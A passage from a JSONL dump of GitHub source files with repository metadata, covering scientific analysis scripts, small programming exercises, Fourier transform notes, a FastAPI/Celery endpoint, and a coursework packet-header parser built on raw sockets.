fetch the Marketing Department work plan at 10:08 today\"])\nrun_list.append([run_time(10,18,0),{\"g_command\":\"get_department_report_easy\",\"department\":2},1,\"[Pre-run command test] Duo'er, fetch the Livestreaming Department work plan at 10:18 today\"])\nrun_list.append([run_time(10,28,0),{\"g_command\":\"get_department_report_easy\",\"department\":4},1,\"[Pre-run command test] Duo'er, fetch the Production and Sales Department work plan at 10:28 today\"])\nrun_list.append([run_time(10,38,0),{\"g_command\":\"get_department_report_easy\",\"department\":1},1,\"[Pre-run command test] Duo'er, fetch the Technology Department work plan at 10:38 today\"])\nrun_list.append([run_time(10,58,0),{\"g_command\":\"get_department_report_easy\",\"department\":5},1,\"[Pre-run command test] Duo'er, fetch the Office work plan at 10:58 today\"])\n\n\n\n\n\n\n\n\ndef call_back(result,json_obj,state):\n \n\n \n print(result)\n pass\n\n\n\nget_api = getapi.get_api(call_back)\n#The timestamp epoch starts at 1970-01-01 08:00:00\n\n#Create a timer function that runs once every second\ndef alarm_clock():\n\n #Check whether the current time is 0:0:0\n\n now = datetime.datetime.now()\n if now.hour == 0 and now.minute == 0 and now.second == 0:\n #Reset the third element of every entry in run_list to 1\n for i in run_list:\n i[2]=1\n\n #Iterate over run_list\n for i in run_list:\n if i[2]==1:\n #Format today's date\n ttime = time.strftime(\"%Y-%m-%d\", time.localtime())+\" 00:00:00\"\n #Convert today's date to a timestamp\n ttime2 = time.mktime(time.strptime(ttime, \"%Y-%m-%d %H:%M:%S\"))\n gettime = ttime2+i[0] #today's midnight timestamp + the time point from run_list\n nowtime = int(time.time()) #the current timestamp\n if nowtime == gettime: #\n i[2]=0\n \n \n\n \n get_api.add_get_api(i[1])\n \n \n \n threading.Timer(0.5, alarm_clock).start()\n\n\n\n#Run the alarm_clock function once per second\nthreading.Timer(1, 
alarm_clock).start()\n\n\n\ntcommand = mate.get_mate(\"Tell me today's Technology Department work plan\")\n\nif tcommand != False:\n get_api.add_get_api(tcommand[0])\n\n\n\n\n\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":4})\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":3})\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":2})\n#get_api.add_get_api({\"g_command\":\"get_department_report_easy\",\"department\":1})\n\nwhile 1:\n pass","repo_name":"c2194/taskbook","sub_path":"flask/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34413822851","text":"from feature_generation import globals\nimport pandas as pd\nfrom feature_generation.eyetracking.saccades import (\n get_saccade_duration,\n)\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef normalize_data(data):\n return [normalize_columns(df) for df in data]\n\n\ndef normalize_columns(df):\n column_names = globals.dataset.column_names\n df[column_names[\"pupil_diameter\"]] = min_max_normalize(\n df[column_names[\"pupil_diameter\"]]\n )\n df = normalize_x_and_y(df)\n df = normalize_time(df)\n return df\n\n\ndef min_max_normalize(values):\n return (values - values.min()) / (values.max() - values.min())\n\n\ndef normalize_time(df):\n column_names = globals.dataset.column_names\n min_time = df[column_names[\"time\"]].min()\n df[column_names[\"time\"]] = df[column_names[\"time\"]] - min_time\n df[column_names[\"fixation_end\"]] = df[column_names[\"fixation_end\"]] - min_time\n df = fix_outliers_in_time(df)\n return df\n\n\ndef normalize_x_and_y(df):\n df[\"x_normalized\"] = min_max_normalize(df[\"x\"]) * 1000\n df[\"y_normalized\"] = min_max_normalize(df[\"y\"]) * 1000\n return df\n\n\ndef fix_outliers_in_time(df):\n saccade_durations = pd.Series(get_saccade_duration(df))\n saccade_durations.index = df.index\n median_duration = saccade_durations.median()\n threshold = 1000\n bool_series = saccade_durations > threshold\n indices = df[bool_series].index\n for i in indices:\n diff = saccade_durations[i]\n df.loc[i + 1 :, \"time\"] -= diff - median_duration\n df.loc[i + 1 :, \"fixation_end\"] -= diff - median_duration\n return df\n","repo_name":"s0lvang/ideal-pancake","sub_path":"feature_generation/normalize/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"22137677132","text":"import matplotlib.pyplot as plt\nimport multiprocessing as mp\nimport copy\nfrom scipy.optimize import curve_fit\nfrom lib.oneqrb import *\n\n\ndef RB_single_sequence(l, delta, rho_initial, delta_t, noise_type):\n np.random.seed()\n cliff_seq = np.random.choice(24, l[-1], replace=True)\n # add noise here\n noise_seq = delta * np.ones(len(cliff_seq))\n # end of adding noise\n seq = get_seq_1q(cliff_seq, noise_seq, delta_t=delta_t, noise_type=noise_type)\n f = np.zeros(len(l))\n # rho = copy.deepcopy(rho_initial)\n\n g = get_perfect_cliff(np.random.randint(24))\n rho = g @ copy.deepcopy(rho_initial) @ g.conj().T\n rho_rd_initial = g @ copy.deepcopy(rho_initial) @ g.conj().T\n\n for i in range(len(seq)):\n rho = seq[i] @ rho @ seq[i].conj().T\n if i+1 in l:\n inv = get_seq_inverse(cliff_seq[:(i+1)])\n rho_inversed = inv @ rho @ inv.conj().T\n # fidelity = abs(np.trace(rho_initial @ rho_inversed))\n fidelity = 
abs(np.trace(rho_rd_initial @ rho_inversed))\n j = l.index(i+1)\n f[j] += fidelity\n return f\n\n# Fitting function\ndef func(x, B, r):\n return 1/2 * (1 - 2 * r) ** x + B\n\n\nL = [1, 3, 5, 7, 10]\ndt = 100\nnoise_type = HAMILTONIAN_NOISE\nrho_0 = np.array([[1, 0],\n [0, 0]])\nrep = 3\n\n\n# constant noise angle TODO: noise frequency here\ndelta_list = [x * 0.01 for x in list(range(1, 51))]\n# delta_list = [0.05, 0.1, 0.15, 0.2]\n\nF_Clifford = np.zeros(len(delta_list))\nr_sqrd = np.zeros(len(delta_list))\n\n\nif __name__ == '__main__':\n for i in range(len(delta_list)):\n result_list = []\n\n def log_result(result):\n result_list.append(result)\n\n pool = mp.Pool()\n for re in range(rep):\n pool.apply_async(RB_single_sequence, args=(L, delta_list[i], rho_0, dt, noise_type), callback=log_result)\n pool.close()\n pool.join()\n F = sum(result_list) / rep\n print(F)\n\n ff = open(str(delta_list[i]) + \"_1q.pkl\", \"wb\")\n pickle.dump((delta_list[i], F), ff)\n ff.close()\n\n popt, pcov = curve_fit(func, L, F, p0=[1, 0], bounds=(0, 1), maxfev=5000)\n F_Clifford[i] = (1 - popt[1]) * 100\n\n residuals = F - func(L, *popt)\n ss_res = np.sum(residuals**2)\n ss_tot = np.sum((F - np.mean(F))**2)\n r_sqrd[i] = 1 - (ss_res/ss_tot)\n\n print(F_Clifford)\n print(r_sqrd)\n\n f5 = open('const_delta_list_1q.pkl', 'wb')\n pickle.dump(delta_list, f5)\n f5.close()\n\n f6 = open('const_delta_fidelity_1q.pkl', 'wb')\n pickle.dump(F_Clifford, f6)\n f6.close()\n\n f7 = open('const_delta_list_r_squared_1q.pkl', 'wb')\n pickle.dump(r_sqrd, f7)\n f7.close()\n\n plot1 = plt.figure(1)\n plt.plot(delta_list, F_Clifford, 'o', markersize=4)\n plt.xlabel(\"Dephasing noise angle (rad)\")\n plt.ylabel(\"Clifford fidelity (%)\")\n plt.show()\n\n plot2 = plt.figure(2)\n plt.plot(delta_list, r_sqrd, 'o', markersize=4)\n plt.xlabel(\"Dephasing noise angle (rad)\")\n plt.ylabel(\"R_squared\")\n plt.show()\n\n","repo_name":"TrellixVulnTeam/RB_2-qubit_NWB2","sub_path":"RB_1q/1q_mp_RB_const_delta.py","file_name":"1q_mp_RB_const_delta.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5153385506","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 19:26:16 2021\nHue: from 0 to 179 \\ hue\nSaturation: from 0 to 255 \\ saturation\nValue: from 0 to 255 \\ brightness or value\n[H,S,V]\n@author: jhongvp\n\"\"\"\n\nimport cv2\nimport numpy as np\n\ncap=cv2.VideoCapture(0)\n\nblueBajo=np.array([100,100,20],np.uint8)\nblueAlto=np.array([125,255,255],np.uint8)\n\nwhile True:\n ret, frame=cap.read()\n if ret == True:\n frameHSV=cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n maskBlue=cv2.inRange(frameHSV,blueBajo,blueAlto)\n maskBluevis = cv2.bitwise_and(frame,frame, mask=maskBlue)\n cv2.imshow('maskBluevis',maskBluevis)\n cv2.imshow('maskBlue',maskBlue)\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('s'):\n break\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"Jhongesell/detertor-de-poligonos-y-sus-parametros","sub_path":"models/omes/Detec-objet/07/program06.py","file_name":"program06.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19522867856","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 26 11:14:15 2022\r\n\r\n@author: Aralimarad\r\n\"\"\"\r\n\r\n\"\"\"\r\nPython program to create a tuple of n integer numbers\r\nand convert it to singleton tuples of values. 
\r\nExample t=(1,2,3) must be converted to t=((1,),(2,),(3,))\r\n\r\n\"\"\"\r\nn=int(input(\"Enter a length:\"))\r\nl=[]\r\nfor i in range(n):\r\n l.append(int(input(\"Enter a number:\")))\r\nprint(\"Tuple is:\",tuple(l))\r\nx=[]\r\nfor k in l:\r\n m=tuple((k,)) #m=k, m=tuple(1,) m=(1,)\r\n x.append(m) #x=[(1,),(2,),(3,)]\r\nprint(\"Tuple converted into a singleton tuple\", tuple(x))\r\n\r\n","repo_name":"mcaralimarad/My-python-codes","sub_path":"lt4.py","file_name":"lt4.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15361123284","text":"##### My code #####\n##### Runtime 145ms, Memory 18.9MB #####\n\nfrom typing import List\nimport collections\nimport heapq\n\ndef topKFrequent(nums: List[int], k: int) -> List[int]: \n freqs = collections.Counter(nums)\n\n heap, res = [], []\n for val, freq in freqs.items():\n heapq.heappush(heap, (-freq, val))\n\n for _ in range(k):\n res.append(heapq.heappop(heap)[1])\n\n return res","repo_name":"imtaesuu/AlgorithmPractice_with_Python","sub_path":"Heap/Leetcode_Top_K_Frequent_Elements/Leetcode_Top_K_Frequent_Elements.py","file_name":"Leetcode_Top_K_Frequent_Elements.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"1674992313","text":"# a variant of the code using a list comprehension\nimport asyncio\nimport time\n\nimport aiohttp\nfrom more_itertools import chunked\n\n\nasync def request_people(session, person_id):\n response = await session.get(f'http://swapi.dev/api/people/{person_id}')\n person_data = await response.json()\n return person_data\n\n\nasync def main():\n start = time.time()\n async with aiohttp.ClientSession() as session:\n tasks = [request_people(session, i) for i in range(1, 51)]\n for chunk_of_tasks in chunked(tasks, 10):\n people_chunk = await asyncio.gather(*chunk_of_tasks)\n for num, i in enumerate(people_chunk, 1):\n print(num, i)\n print()\n print(time.time() - start)\n\n\nasyncio.run(main())\n","repo_name":"ervand7/Summary","sub_path":"Python/Parallelism/Asinchrony/библиотека Asyncio/лекция_нетологии/async3.py","file_name":"async3.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"30556190764","text":"from lib.corpus import Corpus\r\nfrom lib.model import n_gram_model\r\nfrom lib.discounting import discounting\r\nfrom tools.train import train\r\nfrom tools.test import test\r\nfrom ctypes import sizeof\r\nimport sys\r\nfrom tqdm import tqdm\r\nimport argparse\r\nimport json\r\nfrom easydict import EasyDict as edict\r\n\r\nsys.path.append(\"..\")\r\n\r\n\r\ndef parse_args():\r\n parser = argparse.ArgumentParser(description='n-gram language model')\r\n parser.add_argument('--data_path', dest='data_path',\r\n help='path of dataset',\r\n default='./data/', type=str)\r\n parser.add_argument('--config_path', dest='config_path',\r\n help='path of config',\r\n default='./configs/default.json', type=str)\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\ndef get_config(args):\r\n config_path = args.config_path\r\n with open(config_path, 'r') as f:\r\n data = json.load(f)\r\n cfg = edict(data.copy())\r\n return cfg\r\n\r\n\r\ndef main(args, cfg):\r\n model = n_gram_model()\r\n corpus = Corpus(args.data_path, cfg)\r\n if cfg.train:\r\n train(model, corpus,cfg)\r\n if cfg.save:\r\n model.save()\r\n else:\r\n model.load()\r\n test(model, corpus, cfg)\r\n\r\n\r\nif __name__ == 
'__main__':\r\n args = parse_args()\r\n cfg = get_config(args)\r\n main(args, cfg)\r\n","repo_name":"Dou-Yiming/CS382-Projects","sub_path":"Project1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"25448106728","text":"import numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\nimport subprocess as sp\n\nfrom numpy import fft\n\ndef getGlobals():\n global DATA_DIR\n DATA_DIR = \"1_PLOTS_DATA/\"\n sp.call(f\"mkdir -p {DATA_DIR}\", shell=True)\n\ndef get_f_x():\n global x, dx, Lx, Nx\n\n # Gaussian Function\n global sigma # For use when plotting the analytic result\n sigma = 1\n x = np.linspace(-20,20,1001)\n f_x = np.sqrt(1/2/np.pi/sigma**2) * np.exp(-x**2 / 2 / sigma**2) + 0j\n\n ## Shifted Gaussian Function\n ## Shift in real-space results is phase change of the DFT\n ## f(x) --> f(x+dx) => f(k) --> f(k) * e^{-i k dx}\n ## This is called the \"Fourier Shift Theorem\"\n #x = np.linspace(-20,20,1001)\n #global shift # Use this to plot analytic result later\n #shift = 1.0\n #f_x = np.sqrt(1/2/np.pi) * np.exp(-(x-shift)**2 / 2) + 0j\n\n ## Gaussian Function with complex factor (opposite as previous one)\n ## Shift in real-space results is phase change of the DFT\n #x = np.linspace(-20,20,1001)\n #global p0 # Use this to plot analytic result later\n #p0 = 1.0 # Initial momentum --> Intepret as a coordinate shift in momentum space\n #factor = np.exp( -1j * 2 * np.pi * p0 * x )\n #f_x = np.sqrt(1/2/np.pi) * np.exp(-x**2 / 2) * factor\n\n ## Sinusoidal function of frequency k = +- 1\n ## Large grid sampling\n #x = np.linspace(-20,20,1001)\n #f_x = np.sin( 2 * np.pi * x ) + 0j\n \n ## Sinusoidal function of frequency k = +- 1\n ## Small grid sampling\n #x = np.linspace(-2,2,101)\n #f_x = np.sin( 2 * np.pi * x ) + 0j\n\n ## Addition of two waves\n #x = np.linspace(-10,10,2001)\n #f_x = np.sin( 2 * np.pi * x ) + 0.5 * np.sin( np.pi * x ) + 0j\n \n ## Gaussian-dressed wave-packet\n #x = np.linspace(-10,10,1001)\n #f_x = np.exp(-x**2 / 2 / 1**2) * np.sin( 2 * np.pi * x ) + 0j\n \n ##f(x) = 1.0 --> f(k) = delta(k)\n #x = np.linspace(-10,10,1001)\n #f_x = np.ones( len(x) )\n \n ## Single-frequency plane-waves (only positive / only negative)\n #x = np.linspace(-10,10,2001)\n #f_x = np.exp( 1j * 2 * np.pi * x ) # cos + sin\n #f_x = np.exp( -1j * 2 * np.pi * x ) # cos - sin\n\n ## Weird Function -- but which has a frequency\n #x = np.linspace(-50,50,1001)\n #f_x = np.exp( np.sin( np.pi * x ) ) * np.exp( - x**2 / 2 / 5 )\n\n\n # Initialize useful numbers\n Nx = len(x)\n Lx = x[-1] - x[0] # Last minus first\n dx = x[1] - x[0] # Second minus first\n\n \"\"\"\n # Normalize Function\n NORM = np.sum( np.conjugate(f_x) * f_x ) * dx\n #print( \"NORM x (Before)\", NORM )\n f_x /= np.sqrt(NORM)\n NORM = np.sum( np.conjugate(f_x) * f_x ) * dx\n #print( \"NORM x (After) \", NORM )\n \"\"\"\n \n return f_x\n\ndef plot_f_x(f_x):\n plt.plot( x, f_x.real, c=\"black\", label=\"RE\" )\n plt.plot( x, f_x.imag, c=\"red\", label=\"IM\" )\n plt.legend()\n plt.xlim(x[0],x[-1])\n #plt.xlim(-2,2)\n plt.xlabel(\"x\", fontsize=18)\n plt.ylabel(\"f(x)\", fontsize=18)\n plt.tight_layout()\n plt.savefig(f\"{DATA_DIR}/f_x.jpg\")\n plt.clf()\n\ndef get_FT_oneSIDED( f_x ):\n\n # Define the k-grid (reciprocal grid)\n dk = 2 * np.pi / Lx\n kmax = 1 / 2 / dx # This is not angular frequency\n k = np.linspace( -kmax, kmax, Nx )\n\n # Define the Fourier matrix, W\n n = 
np.arange(Nx).reshape( (-1,1) )\n m = np.arange(Nx).reshape( (1,-1) )\n\n ### One-sided transform\n W = np.exp( -2j*np.pi * m * n / Nx )\n \n # Operate W on the real-space function\n f_k = W @ f_x\n \n ### Roll coordinates such that zero is centered\n ### Required for the one-sided transform\n f_k = np.roll( f_k, Nx//2 )\n\n # Add normalization and integral infinitesimal\n f_k *= dx / np.sqrt( 2 * np.pi )\n\n return k, f_k\n\n\ndef get_FT_Centered( f_x ):\n\n # Define the k-grid (reciprocal grid)\n dk = 2 * np.pi / Lx\n kmax = 1 / 2 / dx # This is not angular frequency\n k = np.linspace( -kmax, kmax, Nx )\n\n # Define the Fourier matrix, W\n n = np.arange(Nx).reshape( (-1,1) )\n m = np.arange(Nx).reshape( (1,-1) )\n\n ### Centered transform\n ### Here, we shift the indices to the center\n a = (Nx)//2\n W = np.exp( -2j*np.pi * (m-a) * (n-a) / Nx )\n \n # Operate W on the real-space function\n f_k = W @ f_x\n \n # Add normalization and integral infinitesimal\n f_k *= dx / np.sqrt( 2 * np.pi )\n\n return k, f_k\n\ndef get_numpy_FT( f_x ):\n # Get the fourier transform\n k = fft.fftfreq( len(f_x), d=dx )\n f_k = fft.fft( f_x, norm=\"ortho\" ) * np.sqrt( np.pi / 2 )\n\n # Shift so that most negative k is first\n f_k = np.roll( f_k, Nx//2 )\n k = np.roll( k, Nx//2 )\n\n return k, f_k\n\ndef plot_f_k(k,f_k,k_np,f_k_np,title):\n\n # Plot a version comparing directly to Numpy\n plt.plot( k, np.abs(f_k.real), \"-\", c='black', lw=10, alpha=0.5, label=\"RE (Manual)\" )\n plt.plot( k, np.abs(f_k.imag), \"o-\", c='black', lw=10, alpha=0.5, label=\"IM (Manual)\" )\n\n #print( \"NORM:\", np.sum( np.abs(f_k)**2 ) * (k[1]-k[0]) )\n\n plt.plot( k_np,np.abs(f_k_np.real),\"-\", c='red', lw=2, label=\"RE (Numpy)\" )\n plt.plot( k_np,np.abs(f_k_np.imag), \"o-\", c='red', lw=2, label=\"IM (Numpy)\" )\n\n #print( \"NORM:\", np.sum( f_k_np.real**2 ) * (k_np[1]-k_np[0]) )\n\n plt.legend()\n plt.xlim(-2,2 )\n plt.xlabel(\"k\", fontsize=18)\n plt.ylabel(\"f(k)\", fontsize=18)\n plt.tight_layout()\n plt.savefig(f\"{DATA_DIR}/f_k_{title}.jpg\")\n plt.clf()\n\n\n #########################################\n # Plot a ''clean'' one without comparing to Numpy\n plt.plot( k, f_k.real, \"-\", c='black', lw=2, label=\"RE\" )\n plt.plot( k, f_k.imag, \"-\", c='red', lw=2, label=\"IM\" )\n\n # Gaussian function in k-space -- Analytic Result\n analytic_func_k = np.sqrt(1/2/np.pi) * np.exp(-2 * sigma**2 * k**2 * np.pi**2)\n plt.plot( k, analytic_func_k, \"o\", c=\"black\", label=\"Analytic RE\" )\n\n # Shifted Gaussian function\n #analytic_func_k = np.sqrt(1/2/np.pi) * np.exp(-2 * k**2 * np.pi**2)\n #shifted_analytic = np.exp(-1j * 2 * np.pi * k * shift) * analytic_func_k\n #plt.plot( k, shifted_analytic.real, \"o\", c=\"black\", label=\"Analytic RE\" )\n #plt.plot( k, shifted_analytic.imag, \"o\", c=\"red\", label=\"Analytic IM\" )\n\n plt.legend()\n plt.xlim(-2,2 )\n plt.xlabel(\"k\", fontsize=18)\n plt.ylabel(\"f(k)\", fontsize=18)\n plt.tight_layout()\n plt.savefig(f\"{DATA_DIR}/f_k_{title}_clean.jpg\")\n plt.clf()\n\n\n\n\n\ndef main():\n\n getGlobals()\n f_x = get_f_x()\n plot_f_x(f_x)\n k, f_k = get_FT_oneSIDED(f_x)\n k_np, f_k_np = get_numpy_FT(f_x)\n plot_f_k(k, f_k, k_np, f_k_np,title=\"One-Sided\")\n k, f_k = get_FT_Centered(f_x)\n plot_f_k(k, f_k, k_np, f_k_np,title=\"Centered\")\n\n\n\nif ( __name__ == \"__main__\" ):\n 
main()\n\n\n","repo_name":"bradenmweight/Intro_Computational_Quantum_Mechanics","sub_path":"notes/codes/Chapter_4/1_Fourier_Transform_on_a_Discrete_Grid.py","file_name":"1_Fourier_Transform_on_a_Discrete_Grid.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22889031716","text":"from click import echo\nfrom click.testing import CliRunner\nfrom click_anno import Injectable, command, inject\n\ndef test_injectable():\n class A(Injectable):\n @classmethod\n def __inject__(cls):\n return A()\n\n @command\n def func(a: A):\n assert isinstance(a, A)\n echo(f'{type(a).__name__}')\n\n result = CliRunner().invoke(func, [])\n assert result.output == \"A\\n\"\n assert result.exit_code == 0\n\n\ndef test_inject():\n class Custom:\n pass\n\n inject(Custom, lambda: Custom())\n\n @command\n def func(a: Custom):\n assert isinstance(a, Custom)\n echo(f'{type(a).__name__}')\n\n result = CliRunner().invoke(func, [])\n assert result.output == \"Custom\\n\"\n assert result.exit_code == 0\n","repo_name":"Cologler/click-anno-python","sub_path":"tests/test_inject.py","file_name":"test_inject.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23121910474","text":"import socket\nimport struct\n\ndef parsing_ethernet_header(data):\n ethernet_header = struct.unpack(\"!6c6c2s\", data)\n ether_src = convert_ethernet_address(ethernet_header[0:6])\n ether_dest = convert_ethernet_address(ethernet_header[6:12])\n ip_header = \"0x\"+ethernet_header[12].hex()\n\n print(\"=======ethernet header=======\")\n print(\"src_mac_address:\", ether_src)\n print(\"dest_mac_address:\", ether_dest)\n print(\"ip_version\", ip_header)\n\ndef convert_ethernet_address(data):\n ethernet_addr = list()\n for i in data:\n ethernet_addr.append(i.hex())\n ethernet_addr = \":\".join(ethernet_addr)\n return ethernet_addr\n\n\nrecv_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))\n\nwhile True:\n data = recv_socket.recvfrom(20000)\n parsing_ethernet_header(data[0][0:14])\n \n ip_header_ = struct.unpack(\"!B B H H H B B H 4s 4s\", data[0][14:34])\n ip_version = (ip_header_[0] & 0b11110000) >> 4\n ip_Length = ip_header_[0] & 0b00001111\n ip_differ = (ip_header_[1] & 0b11111100) >> 2\n ip_explicit = ip_header_[1] & 0b00000011\n ip_total_length = ip_header_[2]\n ip_identification = ip_header_[3]\n ip_flags = ip_header_[4]\n\n ip_reserved = (ip_header_[4] & 0x8000) >> 15 \n ip_not_fragments = (ip_header_[4] & 0x4000) >> 14\n ip_fragments = (ip_header_[4] & 0x2000) >> 13\n ip_fragments_offset = ip_header_[4] & 0x1fff\n\n ip_Time_to_live = ip_header_[5]\n ip_protocol = ip_header_[6]\n ip_header_checksum = ip_header_[7]\n ip_source = socket.inet_ntoa(ip_header_[8])\n ip_dest = socket.inet_ntoa(ip_header_[9])\n ip_padding = (ip_Length * 4) - 20\n\n\n print(\"=======ip_header=======\")\n print(\"ip_version: \", ip_version)\n print(\"ip_Length: \", ip_Length)\n print(\"differentiated_service_codepoint: \", ip_differ)\n print(\"explicit_congestion_notification: \", ip_explicit)\n print(\"total_length: \", ip_total_length)\n print(\"identification: \", ip_identification)\n print(\"flags: \", ip_flags)\n print(\">>>reserved_bit: \", ip_reserved)\n print(\">>>not_fragments: \", ip_not_fragments)\n print(\">>>fragments: \", ip_fragments)\n print(\">>>fragments_offset: \", ip_fragments_offset)\n print(\"Time to live: \", 
ip_Time_to_live)\n print(\"protocol: \", ip_protocol)\n print(\"header checksum: \", ip_header_checksum)\n print(\"source_ip_address: \", ip_source)\n print(\"dest_ip_address: \", ip_dest)\n\n \n if ip_protocol == 6:\n tcp_header = struct.unpack(\"!H H I I B B H H H\", data[0][34:54])\n\n tcp_src = tcp_header[0]\n tcp_dec = tcp_header[1]\n tcp_seq = tcp_header[2]\n tcp_header_length = (tcp_header[4] & 0b11110000) >> 4\n tcp_ack = (tcp_header[5] & 0b00010000) >> 4\n tcp_reserved = (tcp_header[4] & 0b00001110) >> 1\n tcp_nonce = (tcp_header[4] & 0b00000001)\n tcp_cwr = (tcp_header[5] & 0b10000000) >> 7\n tcp_urg = (tcp_header[5] & 0b00100000) >> 5\n tcp_push = (tcp_header[5] & 0b00001000) >> 3\n tcp_reset = (tcp_header[5] & 0b00000100) >> 2\n tcp_syn = (tcp_header[5] & 0b00000010) >> 1\n tcp_fin = tcp_header[5] & 0b00000001\n tcp_win = tcp_header[6]\n tcp_checksum = tcp_header[7]\n\n if tcp_ack == 1:\n tcp_ack_num = tcp_header[3]\n else :\n tcp_ack_num = 0\n \n if tcp_urg == 1:\n tcp_urgp = tcp_header[8]\n else :\n tcp_urgp = 0\n\n print(\"=======TCP_header=======\")\n print(\"src_port: \", tcp_src)\n print(\"dec_port: \", tcp_dec)\n print(\"seq_num: \", tcp_seq)\n print(\"ack_num: \", tcp_ack_num)\n print(\"header_len: \", tcp_header_length)\n print(\">>>reserved: \", tcp_reserved)\n print(\">>>nonce: \", tcp_nonce)\n print(\">>>cwr: \", tcp_cwr)\n print(\">>>urgent: \", tcp_urg)\n print(\">>>ack: \", tcp_ack)\n print(\">>>push: \", tcp_push)\n print(\">>>reset: \", tcp_reset)\n print(\">>>syn: \", tcp_syn)\n print(\">>>fin: \", tcp_fin)\n print(\"window_size_value: \", tcp_win)\n print(\"checksum: \", tcp_checksum)\n print(\"urgent pointer: \", tcp_urgp)\n\n elif ip_protocol == 17:\n udp_header = struct.unpack(\"!H H H H\", data[0][34+ip_padding:42+ip_padding])\n udp_src = udp_header[0]\n udp_dst = udp_header[1]\n udp_leng = udp_header[2]\n udp_checksum = udp_header[3]\n\n\n print(\"=======udp_header=======\")\n print(\"src_port: \", udp_src)\n print(\"dst_port: \", udp_dst)\n print(\"leng: \", udp_leng)\n print(\"header checksum: \", udp_checksum)\n\n","repo_name":"cnu-cse-datacom/2-packetcapture-omj9803","sub_path":"DC02_02_201702039_ohmyeongju.py","file_name":"DC02_02_201702039_ohmyeongju.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36987402492","text":"from typing import Any, Dict\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom celery_tasks import task_update_product\n\n\n# Default delay 15 seconds\nDEFAULT_DELAY = 15\napp = FastAPI()\n\n\nclass Task(BaseModel):\n post_url: str\n delay: int = DEFAULT_DELAY\n description: str = None\n payload: Dict[Any, Any]\n\n\n@app.get('/')\ndef greeting():\n return {'Hello'\n 'World!'}\n\n\n@app.post('/tasks/')\nasync def product_task(task: Task):\n # For demo purposes,\n # repeat the job 100 times\n # Note: in production this will trigger 100\n # concurrent requests immediately after the delay\n from random import randint\n from time import sleep\n for _ in range(100):\n # don't flood this free api\n sleep(randint(5, 10))\n task_update_product.apply_async(\n (task.post_url, task.payload,),\n countdown=task.delay,\n )\n return {'message': 'Send jobs!'}\n","repo_name":"zwang96-dl/fastapi_celery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} 
+{"seq_id":"72286494643","text":"import skimage.io as skio\nimport pandas as pd\nfrom skimage.morphology import disk, dilation, medial_axis\nfrom skimage.measure import label, regionprops\nimport shared.image as ima\nimport numpy as np\nfrom skimage.filters import threshold_otsu, threshold_local, sobel\nfrom skimage.morphology import extrema, binary_dilation, binary_erosion, disk, dilation\nimport shared.dataframe as dat\nfrom skimage import segmentation\nimport shared.math as mat\nimport math\nimport napari\n\n# INPUT PARAMETERS\n# file info\nmaster_folder = \"/Users/xwyan/Dropbox/LAB/ChangLab/Projects/Data/20230216_analysis_BRD4-series/\"\ndata_dir = \"%sdata/singleZ/\" % master_folder\ndata_dir2 = \"%sfigures/DNAFISH/\" % master_folder\noutput_dir = \"%sfigures/DNAFISH/\" % master_folder\n\nsample1 = 'DM-Ctrl_mix_mCh-Ctrl'\nfigure_name = sample1\npos_threshold = 15000\nneg_threshold = 12000\nsample1_pos = 'DM H2B-mCherry'\nsample1_neg = 'DM'\nnew_seg = 11000\n\nstart_fov = 15\n\nbatch = 2\nif batch > 0:\n file_name = '%s_%s_RAW' % (sample1, batch)\nelse:\n file_name = '%s_RAW' % sample1\nimg_hoechst_stack = skio.imread(\"%s%s/%s_ch00.tif\" % (data_dir, sample1, file_name), plugin=\"tifffile\")\nimg_DNAFISH_stack = skio.imread(\"%s%s/%s_ch02.tif\" % (data_dir, sample1, file_name), plugin=\"tifffile\")\nimg_mCherry_stack = skio.imread(\"%s%s/%s_ch01.tif\" % (data_dir, sample1, file_name), plugin=\"tifffile\")\n# img_laminB_stack = skio.imread(\"%s%s/%s_ch03.tif\" % (data_dir, sample, file_name), 